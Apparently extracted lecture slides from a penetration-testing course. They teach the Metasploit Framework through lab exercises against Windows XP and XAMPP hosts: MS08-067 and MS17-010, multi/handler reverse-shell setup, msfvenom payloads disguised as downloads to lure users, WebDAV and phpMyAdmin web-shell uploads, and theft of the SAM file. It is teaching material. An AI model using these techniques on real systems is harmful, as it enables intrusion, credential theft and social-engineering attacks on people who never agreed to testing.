Penetration Testing

Using the
Metasploit Framework
Dr. Tran The Son
Vietnam – Korea University
 Metasploit Framework
• Metasploit framework is an open-source security
project that offers multiple penetration testing and
exploits development features.
• All these features can be combined into a set of
modules
 Metasploit Modules
/usr/share/metasploit-framework/modules/ ~/. msf4/modules/
• (1) Payloads
– The single payloads are the complete lightweight malicious codes shared
with the target machines.
– The staged payloads consist of a stub-loader that recalls the host machine
to send the final piece of payload when executed on the target machine.
• (2) Exploits
– the tools used to take over the target machines by exploiting the
vulnerabilities.
• (3) Encoders
– play the role of code scramblers
• (4) Listeners
– used to establishing a connection between the host and target machines
• (5) Auxiliary functions
– the supplementary tools and commands used to perform different
penetration testing tasks, such as scanning, fuzzing, sniffing, etc.
 Metasploit Update
• Check version and update
msfconsole –v
msfupdate
OR:
sudo apt update; sudo apt install metasploit-framework

• Since Metasploit is a Ruby project, the bundler can track

and install the exact Gems required to run the Metasploit.
sudo gem install bundler
• Upgrade Metasploit framework
sudo apt-get upgrade metasploit-framework
• Re-initiate the Metasploit database
sudo msfdb reinit
 Metasploit Startup
• Starting

• Interfaces
– Msfconsole: the text-based console

– Msfcli: the command line interface

 Finding Metasploit Modules
• A module is an executable file or DLL. Each process
consists of one or more modules.
• How do we know this patch is missing on our
Windows XP target?
– E.g. MS08-067 in the netapi32.dll

MS08-067 patched an issue in the netapi32.dll that could allow attackers to use a
specially crafted remote procedure call request via the Server Message Block (SMB)
service to take over a target system.
 The Module Database
• You can use the Metasploit search page to match
Metasploit modules to vulnerabilities

Online database of modules http://www.rapid7.com/db/modules/

 Built-In Search
• Search modules

• …… Detail
4 Privileged tells us whether this
module requires or grants high
privileges on the target.

5 Rank lists the exploit’s potential

impact on the target. Exploits
are ranked from manual to
excellent.

7 Basic options lists various

options for the module that can
be set to make a module better
meet our needs.

8 Payload contains information to

help Metasploit decide
which payloads it can use with
this exploit. Payloads, or
shellcode, tell the exploited
system what to do on behalf of
the attacker.
 Exercise
• Examine the folder structure of Metasploit modules
– Payload
– Exploit
– Encoder
– Listeners
– Auxillary
• Examine the code
– Example.py (or: Example.rb)
 Setting Module Options
• Metasploit will figure out what you want

RHOST refers to the

remote host we want to
exploit.
RPORT refers to the
remote port to attack.
SMBPIPE like the RPORT
value, keep the default
for the SMBPIPE as
BROWSER
Exploit Target the target To set a target option, enter:
operating system and set target <target number>
version.
 Payloads (or Shellcode)
• What to do once the target has been exploited?
• One of the ways that Metasploit makes things easier is by
setting up our payloads for us
• Metasploit has a plethora of payloads, ranging from simple
Windows commands to the extensible Metasploit
Meterpreter
• Payload, in simple terms, are simple scripts that the
hackers utilize to interact with a hacked system.
• Using payloads, they can transfer data to a victim system.
Singles − very small and designed to create some kind of communication, then move to the
next stage. For example, just creating a user.
Staged − It is a payload that an attacker can use to upload a bigger file onto a victim system.
Stages − payload components that are downloaded by Stagers modules. Payload stages
provide advanced features with no size limits such as Meterpreter and VNC Injection.
Finding Compatible Payloads
 A Test Run

Meterpreter is short for meta-interpreter, Metasploit’s unique

payload.

The default options is that Metasploit uses the port 4444. In our lab there is nothing wrong with this. It will
work just fine. However, on real engagements, if your client is using even primitive intrusion-prevention
software, it may take note of traffic on port 4444 and say, “Hey, you are Metasploit, go away!” and drop your
connection.
 Bài tập
• Khởi động Metasploit
• Tìm kiếm thông tin về lỗ hổng MS08-067
– Xác định module của Metasploit cho phép khai thác lỗ
hổng này
• Sử dụng module này để khai thác lỗ hổng trên máy
Win XP
– Thiết lập RHOST
– Exploit
 Types of Shells
• Meterpreter or otherwise, shells fall into two
categories: bind and reverse.
• A bind shell instructs the target
machine to open a command
shell and listen on a local port.
The attack machine then
connects to the target machine
on the listening port
• A reverse shell, on the other
hand, actively pushes a
connection back to the attack
machine rather than waiting for
an incoming connection.
 Metasploit handlers
• Metasploit handlers are best to use for Meterpreter
or most reverse shells.
– A handler is often an abstract object with a well-defined interface,
representing a shared (system) resource that can’t be exposed directly to
users because of security or complexity.
– A handler is usually an object of very small size (4 bytes to 16 bytes).

use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
exploit
 Setting a Payload Manually

Because this is a reverse shell, we need to tell the target where to

send the shell; specifically, we need to give it the IP address of the
attack machine and the port we will listen on.
 Setting a Payload Manually

LHOST is our local

host on the Kali
machine, the IP
address we want our
target machine to
connect back to.
e.g.
set LHOST 192.168.20.9
 Lab Exercise
• Exploit the vulnerability of MS08-078
– Identify vulnerable Win OS
– Identify the risk level
– Scan
– Exploit in 2 methods: binding and reverse
• Exploit the vulnerability of MS17-010 (CVE 2017-0143)
– Identify vulnerable Win OS
– Identify the risk level
– Scan
– Exploit
Hint:
https://learn.microsoft.com/en-us/security-updates/securitybulletins
 Msfvenom
• In 2011, Msfvenom was added to Metasploit.
• It could be used to create standalone encoded
Metasploit payloads in a variety of output formats,
such as Windows executables and ASP pages
• Instead of relying on a missing patch or other security
issue, we are hoping to exploit the one security issue that
may never be fully patched: the users.
• Msfvenom allows you to build standalone payloads to run
on a target system in an attempt to exploit the user whether
through a social-engineering attack or by uploading a
payload to a vulnerable server
 Msfvenom
• Choosing a Payload

root@kali: ~# msfvenom -l payloads

Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp Connect back to attacker an spawn a command shell
android/meterpreter/revers Run a meterpreter server in e_http Android. Tunnel communication
over HTTP
android/meterpreter/revers Run a meterpreter server in e_https Android. Tunnel communication
over HTTPS
android/meterpreter/revers Run a meterpreter server in e_tcp Android. Connect back stager
android/meterpreter/revers Connect back to attacker an e_http d spawn a Meterpreter shell
android/meterpreter/revers Connect back to attacker an e_httpsd spawn a Meterpreter shell
 Msfvenom
• Choosing an Output Format (-f)

• … Combination: payload, format, LHOST, LPORT

 Msfvenom
• Serving Payloads
• One good way to serve up payloads is to host them on a
web server, disguise them as something useful, and lure
users into downloading them
• E.g.
– Copy to home folder: /var/www/html
– On the Windows XP target and open Internet Explorer Browse to
http://192.168.20.9/chapter4example.exe and download the file
 Msfvenom
• Using the Multi/Handler Module
• This module allows us to set up standalone handlers to
catch our Meterpreter connection when our malicious
executable is run from the Windows XP target
Exploiting WebDAV Default Credentials
• XAMPP installed on Windows XP target employs
default login credentials for the WebDAV folder used
to upload files to the web server.
– This issue allows us to upload our own pages to the server with
Cadaver, a command line client for WebDAV, which we used to
verify this vulnerability
Exploiting WebDAV Default Credentials
• Running a Script on the Target Web Server
Exploiting WebDAV Default Credentials
• Uploading a Msfvenom Payload

We can download
and execute a file on
the system (2), create
a shell (1), or even
use Meterpreter (3).
Exploiting WebDAV Default Credentials
• Generate a payload by msfvenom

• Upload using WebDAV

Exploiting WebDAV Default Credentials
• set up a handler in Msfconsole to catch the payload
before executing the script

Use multi/handler in
Msfconsole, set the payload to
php/meterpreter/reverse_tcp
(1), and set LHOST (2) and
LPORT (3) appropriately to
match the generated payload.
 Exploiting Open phpMyAdmin
• By accessing the MySQL database, we can perform
an attack similar to our WebDAV attack and upload
scripts to the web server using MySQL queries
– To explore this attack, first navigate to
http://192.168.20.10/phpmyadmin

The default install

location for
XAMPP’s Apache
on Windows
 Exploiting Open phpMyAdmin
• Run the completed query in phpMyAdmin, and then
browse to the newly created file,
http://192.168.20.10/shell.php?cmd=............
 Exploiting Open phpMyAdmin
• Rather than creating a really long and complicated
SQL SELECT query, we can host a file on our Kali
machine and then use our PHP shell to pull it down
to the web server

• Now we can browse

http://192.168.20.10/meterpreter.php
Note: Be sure to restart the handler to catch the Meterpreter
connection before executing the script.
 Downloading Sensitive Files
• Downloading a Configuration File
• Downloading the Windows SAM
 Exploiting a Buffer Overflow
• SLMail (5.5) server
• vulnerable to the POP3 issue CVE-2003-0264.
Exploiting Third-Party Web Applications
Exploiting a Compromised Service